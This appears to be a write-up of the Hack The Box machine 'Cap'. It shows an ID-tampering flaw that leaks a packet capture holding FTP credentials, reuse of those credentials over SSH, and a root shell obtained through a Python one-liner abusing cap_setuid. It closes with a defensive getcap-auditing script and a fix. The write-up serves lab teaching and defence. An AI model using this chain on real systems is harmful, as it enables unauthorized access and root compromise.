
[HTB] cap (datagram analysis, setuid capability: Python)

2022-02-01 15:20:49 Antenna pot

Disclaimer

The host attacked in this article is a legally authorized target. The tools and methods used here are for learning and exchange only; please do not use them for any illegal purpose. I am not responsible for any consequences of doing so, nor for any misuse or damage caused.

Service detection

┌──(rootkali)-[~/htb/cab]
└─# nmap -sV -Pn 10.10.10.245
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-28 08:33 EST
Nmap scan report for 10.10.10.245
Host is up (0.35s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :


Service enumeration analysis

FTP: anonymous login is not allowed.

Directory brute-forcing found nothing.

The service on port 80 is a network-management style dashboard (no login required). It shows three panels corresponding to ifconfig, netstat and a traffic-capture service (you can download the captured pcap file).

The main attack surface appears to be port 80.

The user name shown in the dashboard is nathan.

At http://10.10.10.245/data/1 the page updates the pcap file every 5 seconds, and you can download the latest file at any time. The IDs cycle through the range 1-5.

But the file containing login information is hidden under entry number 0, that is, http://10.10.10.245/data/0. Only the ID in the URL is checked, so anyone can fetch a capture that was never shown to them.

Isn't that a surprise? Or not?

Download pcap number 0 locally and open it with Wireshark.

Frame 36 reveals the FTP user name: nathan

Frame 40 reveals the FTP password: {not telling you}

Log in to FTP

┌──(rootkali)-[~/htb/cap]
└─# ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:root): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 1001     1001         4096 May 27  2021 .
drwxr-xr-x    3 0        0            4096 May 23  2021 ..
lrwxrwxrwx    1 0        0               9 May 15  2021 .bash_history -> /dev/null
-rw-r--r--    1 1001     1001          220 Feb 25  2020 .bash_logout
-rw-r--r--    1 1001     1001         3771 Feb 25  2020 .bashrc
drwx------    2 1001     1001         4096 May 23  2021 .cache
-rw-r--r--    1 1001     1001          807 Feb 25  2020 .profile
lrwxrwxrwx    1 0        0               9 May 27  2021 .viminfo -> /dev/null
-r--------    1 1001     1001           33 Nov 28 15:32 user.txt
226 Directory send OK.


We have successfully logged in to FTP. This appears to be nathan's home directory; user.txt is there, but we don't have permission to read it.

Initial shell

Many lazy administrators reuse the same credentials across services, so try logging in over SSH with the credentials found above.

┌──(rootkali)-[~/htb/cap]
└─# ssh nathan@10.10.10.245
The authenticity of host '10.10.10.245 (10.10.10.245)' can't be established.
ECDSA key fingerprint is SHA256:8TaASv/TRhdOSeq3woLxOcKrIOtDhrZJVrrE0WbzjSc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.245' (ECDSA) to the list of known hosts.
nathan@10.10.10.245's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Nov 28 16:00:07 UTC 2021

  System load:  0.0               Processes:             225
  Usage of /:   36.6% of 8.73GB   Users logged in:       0
  Memory usage: 21%               IPv4 address for eth0: 10.10.10.245
  Swap usage:   0%

  => There are 2 zombie processes.

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu May 27 11:21:27 2021 from 10.10.14.7
[email protected]:~$ pwd
/home/nathan
[email protected]:~$ ls 
user.txt


Got user.txt.

Privilege escalation

Running linpeas shows that python has the setuid capability:

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

Because cap_setuid is set on the interpreter itself, any user who can run python3.8 can call setuid(0). Escalate privileges with Python:

[email protected]:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id       
uid=0(root) gid=1001(nathan) groups=1001(nathan)
# whoami
root

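To find entries like the python3.8 one before an attacker does, here is an added example (not from the original post or from linpeas) that parses `getcap -r /` output, accepting both the older `path = caps+eip` format shown above and the newer libcap `path caps=ep` format, and flags privilege-granting capabilities as well as any capability set on a general-purpose interpreter. The sample lines are constructed, and the `audit_host` helper is hypothetical and only runs on a Linux host with libcap installed.

```python
import re
import subprocess

# Capabilities that let a process change identity or bypass access control (shortlist).
DANGEROUS_CAPS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
                  "cap_dac_override", "cap_dac_read_search", "cap_sys_module", "cap_setfcap"}
# Binaries that run arbitrary caller-supplied code: any file capability on them is
# handed to every user allowed to execute them, as the python3.8 finding above shows.
INTERPRETER_RE = re.compile(r"/(python[\d.]*|perl[\d.]*|ruby[\d.]*|node|php[\d.]*|lua[\d.]*|bash|sh)$")

def parse_getcap_line(line):
    """Parse one getcap record into (path, {cap names}); None for non-records.

    Old libcap: '/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip'
    New libcap: '/usr/bin/python3.8 cap_setuid,cap_net_bind_service=eip'
    """
    path, _, capspec = line.strip().partition(" ")
    capspec = capspec.lstrip("= ")             # drop the old-format ' = ' separator
    if not path.startswith("/") or not capspec:
        return None                            # e.g. 'Failed to get capabilities of ...'
    caps = set()
    for clause in capspec.split():             # clauses like 'cap_a,cap_b+eip' or 'cap_c=ep'
        names = re.split(r"[+=-]", clause)[0]  # strip the flag suffix
        caps.update(n.lower() for n in names.split(",") if n)
    return path, caps

def audit(lines):
    """Return [(path, caps, reason)] for entries a defender should review."""
    findings = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        if INTERPRETER_RE.search(path):
            findings.append((path, sorted(caps), "file capability on a general-purpose interpreter"))
        elif caps & DANGEROUS_CAPS:
            findings.append((path, sorted(caps & DANGEROUS_CAPS), "privilege-granting capability"))
    return findings

def audit_host():
    """Hypothetical helper: run getcap on this Linux host and audit it (needs libcap)."""
    out = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True)
    return audit(out.stdout.splitlines())      # stderr (unreadable dirs) is ignored

# Constructed sample: the python3.8 line is the one linpeas reported on the box.
SAMPLE = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/mtr-packet cap_net_raw=ep
/usr/local/bin/example-helper = cap_setgid,cap_setuid+ep
Failed to get capabilities of file '/proc/1/exe' (Operation not supported)
"""

if __name__ == "__main__":
    for path, caps, reason in audit(SAMPLE.splitlines()):
        print(f"{path}: {','.join(caps)}  <- {reason}")
```

The fix on a real host is to drop the capability (`setcap -r /usr/bin/python3.8`) and give only the specific service that needs it a dedicated, non-interpreter binary.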

Copyright notice
Author: Antenna pot. Please include the original link when reprinting, thank you.
https://en.pythonmana.com/2022/02/202202011520475088.html
